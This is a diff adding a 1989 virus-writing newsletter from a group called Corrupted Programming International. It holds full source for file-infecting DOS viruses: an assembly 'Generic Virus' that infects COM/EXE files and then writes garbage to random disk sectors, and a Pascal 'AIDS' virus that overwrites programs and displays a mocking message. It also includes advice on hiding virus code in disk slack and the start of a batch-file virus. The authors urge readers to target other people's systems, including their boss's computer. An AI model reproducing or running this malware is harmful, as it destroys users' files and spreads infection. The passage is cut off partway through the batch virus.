+:(Exceptional programmer?) +:(Got connections?) +:(Anything extraordinary?) + + +----------------------------------------------------------------------------- + .Answer Each Question To The Best And Fullest Of Your Ability. +----------------------------------------------------------------------------- + + Future CPI Support BBS's Will Be Active - Applications May Be Turned In Then + \ No newline at end of file diff --git a/textfiles.com/virus/cpivirus2.txt b/textfiles.com/virus/cpivirus2.txt new file mode 100644 index 00000000..842a5c52 --- /dev/null +++ b/textfiles.com/virus/cpivirus2.txt @@ -0,0 +1,1902 @@ +[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + * * + * @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@ @@@@ @@@@ @@@@ @@@ * + * @@@ @@@ @@@@ @@@ * + * @@@ @@@@@@@@@@@@@@@ @@@ * + * @@@ @@@@@@@@@@@@@@ @@@ * + * @@@ @@@ @@@ * + * @@@@ @@@@ @@@ @@@ * + * @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * * + * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + + C O R R U P T E D + + P R O G R A M M I N G + + I N T E R N A T I O N A L + + + + presents: + + + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + @ @ + @ Virili And Trojan Horses @ + @ @ + @ A Protagonist's Point Of View @ + @ @ + @ Issue #2 @ + @ @ + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + + + DISCLAIMER::All of the information contained in this newsletter reflects the + thoughts and ideas of the authors, not their actions. The sole + purpose of this document is to educate and spread information. + Any illegal or illicit action is not endorsed by the authors or + CPI. The authors and CPI are not responsible for any information + which may present itself as old or mis-interpreted, and actions + by the reader. Remember, 'Just Say No!' + + + + + + + + + + + + +CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + Introduction To CPI#2 + --------------------- + Well, here is the "long awaited" second issue of CPI, A Protagonist's Point +of view. This issue should prove a bit interesting, I dunno, but at least +entertaining for the time it takes to read. Enjoy the information and don't +forget the disclaimer. + Oh yes, if you have some interesting articles or an application to send +us, just see the BBS list at the end of this document. Thanx. All applications +and information will be voted on through the CPI Inner Circle. Hope you enjoy +this issue as much as we enjoyed typing it... hehe... + Until our next issue, (which may be whenever), good-bye. + + Doctor Dissector + + + Table of Contents + ----------------- + Part Title Author + ----------------------------------------------------------------------------- + 2.1 Title Page, Introduction, & TOC....................... Doctor Dissector + 2.2 Another Explanation Of Virili And Trojans............. Acid Phreak + 2.3 V-IDEA-1.............................................. Ashton Darkside + 2.4 V-IDEA-2.............................................. Ashton Darkside + 2.5 The Generic Virus..................................... Doctor Dissector + 2.6 Aids.................................................. Doctor Dissector + 2.7 Batch File Virus...................................... PHUN 3.2 + 2.8 Basic Virus........................................... PHUN 3.2 + 2.9 The Alemeda Virus..................................... PHUN 4.3 + 2.10 Virili In The News.................................... Various Sources + 2.11 Application For CPI................................... CPI Inner Circle + (CPI Node Phone #'s Are In 2.11) +[2.2] + Explanation of Viruses and Trojans Horses + ----------------------------------------- + Written by Acid Phreak + + Like it's biological counterpart, a computer virus is an agent of +infection, insinuating itself into a program or disk and forcing its host +to replicate the virus code. Hackers fascinated by the concept of "living" +code wrote the first viruses as projects or as pranks. In the past few +years, however, a different kind of virus has become common, one that lives +up to an earlier meaning of the word: in Latin, virus means poison. + These new viruses incorporate features of another type of insidious +program called a Trojan horse. Such a program masquerades as a useful +utility or product but wreaks havoc on your system when you run it. It may +erase a few files, format your disk, steal secrets--anything software can +do, a Trojan horse can do. A malicious virus can do all this then attempt +to replicate itself and infect other systems. + The growing media coverage of the virus conceptand of specific viruse +has promoted the development of a new type of software. Antivirus programs, +vaccines--they go by many names, but their purpose is to protect from virus +attack. At present there are more antivirus programs than known viruses +(not for long). + Some experts quibble about exactly what a virus is. The most widely +known viruses, the IBM Xmas virus and the recent Internet virus, are not +viruses according to some experts because they do not infect other programs. +Others argue that every Trojan horse is a virus--one that depends completely +on people to spread it. + +How They Reproduce: +------------------- + Viruses can't travel without people. Your PC will not become infected +unless someone runs an infected program on it, whether accidentally or on +purpose. PC's are different from mainframe networks in this way--the +mainframe Internet virus spread by transmitting itself to other systems and +ordering them to execute it as a program. That kind of active transmission +is not possible on a PC. + Virus code reproduces by changing something in your system. Some viruses +strike COMMAND.COM or the hidden system files. Others, like the notorious +Pakistani-Brain virus, modify the boot sector of floppy disks. Still others +attach themselves to any .COM or .EXE file. In truth, any file on your +system that can be executed--whether it's a program, a device driver, an +overlay, or even a batch file--could be the target of a virus. + When an infected program runs, the virus code usually executes first and +then transfers control to the original program. The virus may immediately +infect other programs, or it may load itself into RAM and continue spreading. +If the virus can infect a file that will be used on another system, it has +succeeded. + +What They Can Do: +----------------- + Viruses go through two phases: a replication phase and an action phase. +The action doesn't happen until a certain even occurs--perhaps reaching a +special date or running the virus a certain number of times. It wouldn't +make sense for a virus to damage your system the first time it ran; it needs +some time to grow and spread first. + The most vulnerable spot for a virus attack is your hard disk's file +allocation table (FAT). This table tells DOS where every file's data resides +on the disk. Without the FAT, the data's still there but DOS can't find it. +A virus could also preform a low-level format on some or all the tracks of +your hard disk, erase all files, or change the CMOS memory on AT-class +computers so that they don't recognize the hard disk. + Most of the dangers involve data only, but it's even possible to burn +out a monochrome monitor with the right code. + Some virus assaults are quite subtl. One known virus finds four +consecutive digits on the screen and switches two. Let's hope you're not +balancing the company's books when this one hits. Others slow down system +operations or introduce serious errors. +[2.3] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + "We ain't the phucking Salvation Army." + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + "Ok, I've written the virus, now where the hell do I put it?" + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we "just say no" to doing it. +******************************************************************************* + + Ok, wow! You've just invented the most incredibly nifty virus. It +slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data! +But the only problem is, if you go around infecting every damn file, some cute +software company is going to start putting in procedures that checksum their +warez each time they run, which will make life for your infecting virus a total +bitch. Or somebody's going to come up with an incredibly nifty vaccination util +that will wipe it out. Because, i mean, hey, when disk space starts vanishing +suddenly in 500K chunks people tend to notice. Especially people like me that +rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying +"wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need +to go around wasting your precious time when the answer is right there in front +of you! Think about it, you could be putting that time into writing better and +more inovative viruses, or you could be worring about keeping the file size, +the date & time, and the attributes the same. With this system, you only need +to infect one file, preferably one that's NOT a system file, but something that +will get run alot, and will be able to load your nifty virus on a daily basis. +This system also doesn't take up any disk space, other than the loader. And the +loader could conceivably be under 16 bytes (damn near undetectable). First of +all, you need to know what programs to infect. Now, everybody knows about using +COMMAND.COM and that's unoriginal anyway, when there are other programs people +run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or +WordPerfect; you get the idea. Better still are dos commands like Format, Link +or even compression utilities. But you get the point. Besides, who's going to +miss 16 bytes, right? Now, the good part: where to put the damn thing. One note +to the programmer: This could get tricky if your virus is over 2k or isn't +written in Assembly, but the size problem is easy enough, it would be a simple +thing to break your virus into parts and have the parts load each other into +the system so that you do eventually get the whole thing. The only problem with +using languages besides assembly is that it's hard to break them up into 2k +segments. If you want to infect floppys, or smaller disks, you'd be best off to +break your file into 512 byte segments, since they're easier to hide. But, hey, +in assembly, you can generate pretty small programs that do alot, tho. Ok, by +now you've probably figured out that we're talking about the part of the disk +called 'the slack'. Every disk that your computer uses is divided up into parts +called sectors, which are (in almost all cases) 512 bytes. But in larger disks, +and even in floppies, keeping track of every single sector would be a complete +bitch. So the sectors are bunched together into groups called 'clusters'. On +floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard +disks, they're typically 4096 bytes, or eight sectors. Now think about it, you +have programs on your hard disk, and what are the odds that they will have +sizes that always end up in increments of 4096? If I've lost you, think of it +this way: the file takes up a bunch of clusters, but in the last cluster it +uses, there is usually some 'slack', or space that isn't used by the file. This +space is between where the actual file ends and where the actual cluster ends. +So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard +disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton +program 'FS /S /T' command from your root directory, and subtract the total +size of the files from the total disk space used. That's how much 'slack' space +is on your disk (a hell of alot, even on a floppy). To use the slack, all you +need to do is to find a chunk of slack big enough to fit your virus (or a +segment of your virus) and use direct disk access (INT 13) to put your virus +there. There is one minor problem with this. Any disk write to that cluster +will overwrite the slack with 'garbage' from memory. This is because of the way +DOS manages it's disk I/O and it can't be fixed without alot of hassles. But, +there is a way around even this. And it involves a popular (abeit outdated and +usually ineffectual) form of virus protection called the READ-ONLY flag. This +flag is the greatest friend of this type of virus. Because if the file is not +written to, the last cluster is not written to, and voila! Your virus is safe +from mischivious accidents. And since the R-O flag doesn't affect INT 13 disk +I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set + +because that has the same Read-only effect (even tho I haven't seen it written, +it's true that if the file is designated system, DOS treats it as read-only, +whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM +in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too +lazy to find out myself) or a protected (!) COMMAND.COM file in either type of +DOS would be ideal for this. All you have to do is then insert your loader into +some innocent-looking file, and you are in business. All your loader has to do +is read the sector into the highest part of memory, and do a far call to it. +Your virus cann then go about waiting for floppy disks to infect, and place +loaders on any available executable file on the disk. Sound pretty neet? It is! +Anyway, have fun, and be sure to upload your virus, along with a README file on +how it works to CPI Headquarters so we can check it out! And remember: don't +target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if +the Sysop is a leech and you want to shove his balls down his throat. Because +if all the PHP boards go down (especially members of CPI), who the hell can you +go to for all these nifty virus ideas? And besides, it's betraying your own +people, which is uncool even if you are an anarchist. So, target uncool PD +boards, or your boss's computer or whatever, but don't attack your friends. +Other than that, have phun, and phuck it up! + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applicaitons Network (SATAN) + Corrupted Programmers International (CPI) + + +PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk). + +Call these boards because the sysops are cool: +Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader) +System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader) +The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader) +D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader) +The Jolly Bardsmen's Pub & Tavern +The Sierra Crib +The Phrozen Phorest +Knight Shadow's Grotto + +And if I forgot your board, sorry, but don't send me E-mail bitching about it! +[2.4] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + "We ain't the phucking Salvation Army." + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + CPI Virus Standards - Protect yourself and your friends + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we "just say no" to doing it. +******************************************************************************* + + One of the main problems with viruses is that once you set one loose, +it is no longer under your control. I propose to stop this by introducing some +standards of virus writing that will enable them to be deactivated whenever +they enter a 'friendly' (CPI) system. In the long run, even the author of the +virus is not immune to being attacked. The following are what I have termed the +CPI standards for writing viruses. They will allow a virus to easily check any +system they are being run on for a type of 'identity badge'. If it is found, +the virus will not infect the system it is being run on. The other standards +are mostly written around this. + +CPI Standards for writing viruses - + + 1 - The virus will have an 'active period' and an 'inactive period'. + The active periods will be no more than one year in length (to make + it more difficult to discover the virus). You may release different + versions of your virus with different 'active periods'. It is not + recommended that your virus deactivate itself after the set active + period, as this would enable people to deactivate viruses by using + their computer with the date set to 2069 or something. It is also + required that activation periods begin on January 1 and end on + December 31. This will coincide with the changing identity codes. + + 2 - The virus will check for an identity code by executing Interrrupt + 12h with the following register settings: AX - 4350, BX - 4920, + CX - AB46, DX - 554E. If the system is friendly, then a pointer + will be returned in CX:DX to an ASCIIZ (0-terminated) string which + will have different contents in different years. The codes are not + to be included in any text file, and should only be given through + E-mail on CPI affiliated systems. You can always ask me by sending + me mail at The Andromeda Strain BBS. If a system is detected as + friendly, the virus will not attempt to infect or damage it, but it + is ok to display a little greeting message about how lucky the + user was. + + 3 - We very much encourage you to upload your virus, along with a breif + description on the workings into the CPI section at The Andromeda + Strain BBS. Only CPI members will know about your virus. This is + so that CPI members can share techniques and it also allows us to + verify that the identity check works. If we see any improvements + that could be made, such as ways to streamline code, better ways of + spreading, etc. we will inform you so that you can make the changes + if you wish. + + 4 - It is also suggested that you use ADS standard for virus storage on + infected disks. This meathod uses disk slack space for storage and + is more thoroughly described in a previous text file by me. I think + that this is the most effective and invisible way to store viruli. + + 5 - A list of CPI-Standard viruli will be avaliable at all times from + The Andromeda Strain BBS, to CPI users. Identity strings will also + be available to anyone in CPI, or anyone who uploads source code to + a virus which is 100% complete except for the Identity string (it + must be written to CPI-Standards). Non-CPI members who do this will + be more seriously considered for membership in CPI. + + Ashton Darkside + Dallas Underground Network Exchange (DUNE) + Software And Telecom Applications Network (SATAN) + Corrupted Programmers International (CPI) + +PS: This file (by itself) has approx 2.5k of slack. +;[2.5] +;============================================================================= +; +; C*P*I +; +; CORRUPTED PROGRAMMING INTERNATIONAL +; ----------------------------------- +; p r e s e n t s +; +; T H E +; _ _ +; (g) GENERIC VIRUS (g) +; ^ ^ +; +; +; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF +; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT +; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO +; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. +; +; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON +; THE DISK. HAVE PHUN WITH THIS ONE. +; +; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE +; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. +; +; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE +; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF +; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR +; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. +; +; DOCTOR DISSECTOR +; CPI INNER CIRCLE +; +;============================================================================= + +MAIN: + NOP ;| Marker bytes that identify this program + NOP ;| as infected/a virus + NOP ;| + + MOV AX,00 ;| Initialize the pointers + MOV ES:[POINTER],AX ;| + MOV ES:[COUNTER],AX ;| + MOV ES:[DISKS B],AL ;| + + MOV AH,19 ;| Get the selected drive (dir?) + INT 21 ;| + + MOV CS:DRIVE,AL ;| Get current path (save drive) + MOV AH,47 ;| (dir?) + MOV DH,0 ;| + ADD AL,1 ;| + MOV DL,AL ;| (in actual drive) + LEA SI,CS:OLD_PATH ;| + INT 21 ;| + + MOV AH,0E ;| Find # of drives + MOV DL,0 ;| + INT 21 ;| + CMP AL,01 ;| (Check if only one drive) + JNZ HUPS3 ;| (If not one drive, go the HUPS3) + MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) + + HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive + LEA BX,SEARCH_ORDER ;| + ADD BX,AX ;| + ADD BX,0001 ;| + MOV CS:POINTER,BX ;| + CLC ;| + +CHANGE_DISK: ;| Carry is set if no more .COM files are + JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be + MOV AH,17 ;| renamed to .COM (change .EXE to .COM) + LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program + INT 21 ;| to large to fit in memory" when starting + CMP AL,0FF ;| larger infected programs + JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) + + MOV AH,2CH ;| If neither .COM or .EXE files can be found, + INT 21 ;| then random sectors on the disk will be + MOV BX,CS:POINTER ;| overwritten depending on the system time + MOV AL,CS:[BX] ;| in milliseconds. This is the time of the + MOV BX,DX ;| complete "infection" of a storage medium. + MOV CX,2 ;| The virus can find nothing more to infect + MOV DH,0 ;| starts its destruction. + INT 26 ;| (write crap on disk) + +NO_NAME_CHANGE: ;| Check if the end of the search order table + MOV BX,CS:POINTER ;| has been reached. If so, end. + DEC BX ;| + MOV CS:POINTER,BX ;| + MOV DL,CS:[BX] ;| + CMP DL,0FF ;| + JNZ HUPS2 ;| + JMP HOPS ;| + +HUPS2: ;| Get a new drive from the search order table + MOV AH,0E ;| and select it, beginning with the ROOT dir. + INT 21 ;| (change drive) + MOV AH,3B ;| (change path) + LEA DX,PATH ;| + INT 21 ;| + JMP FIND_FIRST_FILE ;| + +FIND_FIRST_SUBDIR: ;| Starting from the root, search for the + MOV AH,17 ;| first subdir. First, (change .exe to .com) + LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the + INT 21 ;| old directory. + MOV AH,3B ;| (use root directory) + LEA DX,PATH ;| + INT 21 ;| + MOV AH,04E ;| (search for first subdirectory) + MOV CX,00010001B ;| (dir mask) + LEA DX,MASKE_DIR ;| + INT 21 ;| + JC CHANGE_DISK ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + DEC BX ;| + JZ USE_NEXT_SUBDIR ;| + +FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more + MOV AH,4FH ;| are found, the (search for next subdir) + INT 21 ;| drive will be changed. + JC CHANGE_DISK ;| + DEC BX ;| + JNZ FIND_NEXT_SUBDIR ;| + +USE_NEXT_SUBDIR: + MOV AH,2FH ;| Select found directory. (get dta address) + INT 21 ;| + ADD BX,1CH ;| + MOV ES:[BX],W"\" ;| (address of name in dta) + INC BX ;| + PUSH DS ;| + MOV AX,ES ;| + MOV DS,AX ;| + MOV DX,BX ;| + MOV AH,3B ;| (change path) + INT 21 ;| + POP DS ;| + MOV BX,CS:COUNTER ;| + INC BX ;| + MOV CS:COUNTER,BX ;| + +FIND_FIRST_FILE: ;| Find first .COM file in the current dir. + MOV AH,04E ;| If there are none, (Search for first) + MOV CX,00000001B ;| search the next directory. (mask) + LEA DX,MASKE_COM ;| + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + JMP CHECK_IF_ILL ;| + +FIND_NEXT_FILE: ;| If program is ill (infected) then search + MOV AH,4FH ;| for another. (search for next) + INT 21 ;| + JC FIND_FIRST_SUBDIR ;| + +CHECK_IF_ILL: ;| Check if already infected by virus. + MOV AH,3D ;| (open channel) + MOV AL,02 ;| (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV BX,AX ;| (save channel) + MOV AH,3FH ;| (read file) + MOV CH,BUFLEN ;| + MOV DX,BUFFER ;| (write in buffer) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + MOV BX,CS:[BUFFER] ;| (look for three NOP's) + CMP BX,9090 ;| + JZ FIND_NEXT_FILE ;| + + MOV AH,43 ;| This section by-passes (write enable) + MOV AL,0 ;| the MS/PC DOS Write Protection. + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + MOV AH,43 ;| + MOV AL,01 ;| + AND CX,11111110B ;| + INT 21 ;| + + MOV AH,3D ;| Open file for read/write (open channel) + MOV AL,02 ;| access (read/write) + MOV DX,9EH ;| (address of name in dta) + INT 21 ;| + + MOV BX,AX ;| Read date entry of program and (channel) + MOV AH,57 ;| save for future use. (get date) + MOV AL,0 ;| + INT 21 ;| + PUSH CX ;| (save date) + PUSH DX ;| + + MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) + MOV CS:[JMPBUF],DX ;| the program will be saved for future use. + MOV DX,CS:[BUFFER+1] ;| (save new jump) + LEA CX,CONT-100 ;| + SUB DX,CX ;| + MOV CS:[CONTA],DX ;| + + MOV AH,57 ;| The virus now copies itself to (write date) + MOV AL,1 ;| to the start of the file. + POP DX ;| + POP CX ;| (restore date) + INT 21 ;| + MOV AH,3EH ;| (close file) + INT 21 ;| + + MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus + MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the + ;| start of the program. This is done to +HOPS: ;| preserve the executability of the host + NOP ;| program as much as possible. After saving, + CALL USE_OLD ;| it still works with the jump address in the + ;| virus. The jump address in the virus differs + ;| from the jump address in memory + +CONT DB 0E9 ;| Continue with the host program (make jump) +CONTA DW 0 ;| + MOV AH,00 ;| + INT 21 ;| + +USE_OLD: + MOV AH,0E ;| Reactivate the selected (use old drive) + MOV DL,CS:DRIVE ;| drive at the start of the program, and + INT 21 ;| reactivate the selected path at the start + MOV AH,3B ;| of the program.(use old drive) + LEA DX,OLD_PATH-1 ;| (get old path and backslash) + INT 21 ;| + RET ;| + +SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF + +POINTER DW 0000 ;| (pointer f. search order) +COUNTER DW 0000 ;| (counter f. nth. search) +DISKS DB 0 ;| (number of disks) +MASKE_COM DB "*.COM",00 ;| (search for com files) +MASKE_DIR DB "*",00 ;| (search for dir's) +MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB + DB 0,"????????EXE",0,0,0,0 + DB 0,"????????COM",0 +MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB + DB 0,"???????????",0,0,0,0 + DB 0,"????????COM",0 + +BUFFER EQU 0E00 ;| (a safe place) + +BUFLEN EQU 208H ;| Length of virus. Modify this accordingly + ;| if you modify this source. Be careful + ;| for this may change! + +JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) + +PATH DB "\",0 ;| (first place) +DRIVE DB 0 ;| (actual drive) +BACK_SLASH DB "\" +OLD_PATH DB 32 DUP (?) ;| (old path) +[2.6] + +-------------------------------+ +--------------------------------------+ + | | P | | + | @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### | + | @@ @@ @@ @@ | R | # # # # # # | + | @@ @@ @@ @@ | * | ##### # # # ##### | + | @@ @@@@@@@@ @@ | E | # # # # # # | + | @@ @@ @@ | * | # # ##### #### ##### | + | @@ @@ @@ | S | | + | @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+ + | | E | A NEW AND IMPROVED VIRUS FOR | + +-------------------------------+ * | PC/MS DOS MACHINES | + | C O R R U P T E D | N +--------------------------------------+ + | | * | CREATED BY: DOCTOR DISSECTOR | + | P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY| + | | * | AUTHOR NOT RESPONSIBLE FOR READERS | + | I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS| + +-------------------------------+ +--------------------------------------+ + + Well well, here it is... I call it AIDS... It infects all COM files, but it is + not perfect, so it will also change the date/time stamp to the current system. + Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them! + + Anyway, this virus was originally named NUMBER ONE, and I modified the code so + that it would fit my needs. The source code, which is included with this neato + package was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works. + + Well, I added a few things, you can experiment or mess around with it if you'd + like to, and add any mods to it that you want, but change the name and give us + some credit if you do. + + The file is approximately 13k long, and this extra memory will be added to the + file it picks as host. If no more COM files are to be found, it picks a random + value from 1-10, and if it happens to be the lucky number 7, AIDS will present + a nice screen with lots of smiles, with a note telling the operator that their + system is now screwed, I mean permanantly. The files encrypted containing AIDS + in their code are IRREVERSIBLY messed up. Oh well... + + Again, neither CPI nor the author of Number One or AIDS endorses this document + and program for use in any illegal manner. Also, CPI, the author to Number One + and AIDS is not responsible for any actions by the readers that may prove harm + in any way or another. This package was written for EDUCATIONAL purposes only! + +{ Beginning of source code, Turbo Pascal 3.01a } +{C-} +{U-} +{I-} { Wont allow a user break, enable IO check } + +{ -- Constants --------------------------------------- } + +Const + VirusSize = 13847; { AIDS's code size } + + Warning :String[42] { Warning message } + = 'This File Has Been Infected By AIDS! HaHa!'; + +{ -- Type declarations------------------------------------- } + +Type + DTARec =Record { Data area for file search } + DOSnext :Array[1..21] of Byte; + Attr : Byte; + Ftime, + FDate, + FLsize, + FHsize : Integer; + FullName: Array[1..13] of Char; + End; + +Registers = Record {Register set used for file search } + Case Byte of + 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); + 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); + End; + +{ -- Variables--------------------------------------------- } + +Var + { Memory offset program code } + ProgramStart : Byte absolute Cseg:$100; + { Infected marker } + MarkInfected : String[42] absolute Cseg:$180; + Reg : Registers; { Register set } + DTA : DTARec; { Data area } + Buffer : Array[Byte] of Byte; { Data buffer } + TestID : String[42]; { To recognize infected files } + UsePath : String[66]; { Path to search files } + { Lenght of search path } + UsePathLenght: Byte absolute UsePath; + Go : File; { File to infect } + B : Byte; { Used } + LoopVar : Integer; {Will loop forever} + +{ -- Program code------------------------------------------ } + +Begin + GetDir(0, UsePath); { get current directory } + if Pos('\', UsePath) <> UsePathLenght then + UsePath := UsePath + '\'; + UsePath := UsePath + '*.COM'; { Define search mask } + Reg.AH := $1A; { Set data area } + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } + Reg.AH := $4E; + Reg.DS := Seg(UsePath); + Reg.DX := Ofs(UsePath[1]); + Reg.CX := $ff; { Set attribute to find ALL files } + MsDos(Reg); { Find first matching entry } + IF not Odd(Reg.Flags) Then { If a file found then } + Repeat + UsePath := DTA.FullName; + B := Pos(#0, UsePath); + If B > 0 then + Delete(UsePath, B, 255); { Remove garbage } + Assign(Go, UsePath); + Reset(Go); + If IOresult = 0 Then { If not IO error then } + Begin + BlockRead(Go, Buffer, 2); + Move(Buffer[$80], TestID, 43); + { Test if file already ill(Infected) } + If TestID <> Warning Then { If not then ... } + Begin + Seek (Go, 0); + { Mark file as infected and .. } + MarkInfected := Warning; + { Infect it } + BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); + Close(Go); + Halt; {.. and halt the program } + End; + Close(Go); + End; + { The file has already been infected, search next. } + Reg.AH := $4F; + Reg.DS := Seg(DTA); + Reg.DX := Ofs(DTA); + MsDos(Reg); + { ......................Until no more files are found } + Until Odd(Reg.Flags); +Loopvar:=Random(10); +If Loopvar=7 then +begin + Writeln(' '); {Give a lot of smiles} +Writeln(''); +Writeln(' '); +Writeln('  ATTENTION: '); +Writeln('  I have been elected to inform you that throughout your process of '); +Writeln('  collecting and executing files, you have accidentally HK '); +Writeln('  yourself over; again, that''s PHUCKED yourself over. No, it cannot '); +Writeln('  be; YES, it CAN be, a s has infected your system. Now what do '); +Writeln('  you have to say about that? HAHAHAHA. Have H with this one and '); +Writeln('  remember, there is NO cure for '); +Writeln('  '); +Writeln('  '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  ۱۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ ۱ ۱ '); +Writeln('  ۱ ۱ ۱ ۱ '); +Writeln('  '); +Writeln('  '); +Writeln(' '); +REPEAT +LOOPVAR:=0; +UNTIL LOOPVAR=1; +end; +End. + +{ Although this is a primitive virus its effective. } +{ In this virus only the .COM } +{ files are infected. Its about 13K and it will } +{ change the date entry. } +[2.7] + + Batch Viruses + ------------- + + +Whoever thought that viruses could be in BATCH file.This virus which we + +are about to see makes use of MS-DOS operating system. This BATCH virus +uses DEBUG & EDLIN programs. + +Name: VR.BAT + +echo = off ( Self explanatory) +ctty nul ( This is important. Console output is turned off) +path c:\msdos ( May differ on other systems ) +dir *.com/w>ind ( The directory is written on "ind" ONLY name entries) + +edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear) +debug ind<2 ( New batch program is created with debug) +edlin name.bat<3 ( This batch goes to an executable form because of EDLIN) +ctty con ( Console 